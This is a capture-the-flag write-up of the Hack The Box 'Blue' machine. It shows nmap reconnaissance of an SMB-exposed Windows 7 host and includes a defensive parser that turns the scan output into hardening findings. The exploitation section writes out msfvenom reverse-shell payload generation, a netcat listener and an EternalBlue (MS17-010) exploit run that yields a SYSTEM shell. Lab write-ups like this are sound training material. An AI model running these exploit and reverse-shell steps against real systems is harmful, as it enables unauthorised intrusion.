Hack The Box: Blue Write-up (#30)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.40
  • -sC: run the default NSE script set
  • -sV: service/version detection
  • -O: OS detection
  • -oA: write results in all three output formats (normal, grepable, XML)
  • -p-: scan all ports, 1–65535

Open ports found:
  • 139/tcp: netbios-ssn
  • 445/tcp: microsoft-ds (SMB)
  • 135/tcp and 49152–49157/tcp: Microsoft Windows RPC
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.0099s latency).
Scanned at 2020-08-29 18:17:03 +08 for 111s
Not shown: 65526 closed ports
Reason: 65526 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
...SNIP...
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26781/tcp): CLEAN (Couldn't connect)
| Check 2 (port 12383/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19006/udp): CLEAN (Failed to receive data)
| Check 4 (port 60195/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-29T11:18:49+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-29T10:18:51
|_ start_date: 2020-08-29T10:16:53
...
nmap -sU -O --top-ports=20 -oA nmap/udp 10.10.10.40
  • -sU: UDP scan
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.011s latency).
Scanned at 2020-08-29 18:17:03 +08 for 329s
PORT STATE SERVICE REASON VERSION
53/udp closed domain port-unreach ttl 127
67/udp closed dhcps port-unreach ttl 127
68/udp closed dhcpc port-unreach ttl 127
69/udp closed tftp port-unreach ttl 127
123/udp closed ntp port-unreach ttl 127
135/udp closed msrpc port-unreach ttl 127
137/udp open|filtered netbios-ns no-response
138/udp open|filtered netbios-dgm no-response
139/udp closed netbios-ssn port-unreach ttl 127
161/udp closed snmp port-unreach ttl 127
162/udp closed snmptrap port-unreach ttl 127
445/udp closed microsoft-ds port-unreach ttl 127
500/udp open|filtered isakmp no-response
|_ike-version: ERROR: Script execution failed (use -d to debug)
514/udp closed syslog port-unreach ttl 127
520/udp closed route port-unreach ttl 127
631/udp closed ipp port-unreach ttl 127
1434/udp closed ms-sql-m port-unreach ttl 127
1900/udp closed upnp port-unreach ttl 127
4500/udp open|filtered nat-t-ike no-response
49152/udp closed unknown port-unreach ttl 127
Too many fingerprints match this host to give specific OS details
...

Service Enumeration

nmap --script smb-vuln* -p139,445 -oA smb-vuln-scan.nmap 10.10.10.40
(Nmap SMB vuln scan output shown as an image in the original post.)
nmap --script smb-os-discovery -p139,445 -oA OS-Discobvery 10.10.10.40
...SNIP...
Nmap scan report for 10.10.10.40
Host is up (0.0086s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-29T11:21:56+01:00
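The two scans above print the same SMB host-script blocks (smb-os-discovery, smb-security-mode, smb2-security-mode). Read from the defender's side, those lines already spell out the exposure: SMB reachable on 445/tcp, a Windows 7 host, the SMB1 dialect answering with signing disabled, SMB2 signing not required, and a guest account accepted. The following parser is an added example, not code from the write-up or from the AutoBlue project; it turns Nmap's normal-format output into a list of hardening findings. The sample text is constructed from the lines the scan printed for 10.10.10.40, with Nmap's real indentation restored.

```python
# Added example: parse Nmap normal output (port table + NSE host-script
# blocks) and derive SMB hardening findings. Not from the original post.
import re
from dataclasses import dataclass, field

# Constructed sample, assembled from the scan lines in the write-up.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.40
PORT      STATE SERVICE      REASON          VERSION
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   Computer name: haris-PC
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered|open\|filtered)\s+(\S+)")
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")


@dataclass
class HostReport:
    address: str = ""
    open_ports: dict = field(default_factory=dict)  # "445/tcp" -> service name
    scripts: dict = field(default_factory=dict)     # script -> {key: value}
    notes: dict = field(default_factory=dict)       # script -> lines without a value


def parse_nmap_normal(text: str) -> HostReport:
    """Parse one host's normal-format (-oN) Nmap output into a HostReport."""
    report = HostReport()
    current = None  # name of the NSE script block we are inside
    for raw in text.splitlines():
        line = raw.rstrip()
        if m := REPORT_RE.match(line):
            report.address = m.group(1)
            continue
        if m := PORT_RE.match(line):
            port, proto, state, service = m.groups()
            if state == "open":
                report.open_ports[f"{port}/{proto}"] = service
            continue
        if not line.startswith("|"):
            current = None  # left the "Host script results" section
            continue
        body = line[1:]
        if body.startswith("_"):  # "|_" marks the last line of a script block
            body = body[1:]
        indent = len(body) - len(body.lstrip(" "))
        stripped = body.strip()
        if indent == 1 and stripped.endswith(":"):
            current = stripped[:-1]  # top-level "| script-name:" header
            report.scripts[current] = {}
            report.notes[current] = []
        elif current is not None:
            key, sep, value = stripped.partition(":")
            if sep and value.strip():
                report.scripts[current][key.strip()] = value.strip()
            else:
                report.notes[current].append(key.strip())
    return report


def smb_findings(report: HostReport) -> list:
    """Defender-side findings derived from the SMB script results."""
    findings = []
    if "445/tcp" in report.open_ports:
        findings.append("SMB (445/tcp) reachable from the scanning network; restrict at the firewall")
    os_name = report.scripts.get("smb-os-discovery", {}).get("OS", "")
    if os_name.startswith("Windows 7"):
        findings.append("Windows 7 host: out of extended support since 2020-01-14; verify MS17-010 patch state")
    mode = report.scripts.get("smb-security-mode", {})
    if mode.get("message_signing", "").startswith("disabled"):
        findings.append("SMBv1 dialect answered with signing disabled; disable SMBv1 and require signing")
    if mode.get("account_used") == "guest":
        findings.append("Guest account accepted for SMB enumeration; disable guest and null sessions")
    if any("not required" in n for n in report.notes.get("smb2-security-mode", [])):
        findings.append("SMB2 signing enabled but not required; set RequireSecuritySignature")
    return findings


if __name__ == "__main__":
    rep = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    print(f"{rep.address}: open ports {sorted(rep.open_ports)}")
    for finding in smb_findings(rep):
        print(" -", finding)
```

Run it against any `-oN` file (`parse_nmap_normal(open("nmap/full.nmap").read())`) to get the same findings for other hosts. The header test (`indent == 1`) relies on Nmap's own layout, where script names sit one space after `|` and their keys are indented further; the "2.02:" dialect line is kept as a note rather than a key so the SMB2 signing sentence beneath it stays attached to the right script.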

Exploitation

  1. Download exploit code from GitHub.
  2. Create MSFvenom reverse shell payload.
  3. Run the exploit.
git clone https://github.com/lokendrasinghrawat/AutoBlue-MS17-010.git
root@kali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.10
LPORT you want x64 to listen on:
53
LPORT you want x86 to listen on:
8080
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.10 LPORT=53
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.10 LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
nc -nlvp 53
root@kali:/opt/AutoBlue-MS17-010# pwd
/opt/AutoBlue-MS17-010
python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_x64.bin
(Screenshots in the original post: SYSTEM reverse shell, user.txt flag, root.txt flag.)

Attack Strategy Map

(Strategy map shown as an image in the original post.)

Written by Joshua Surendran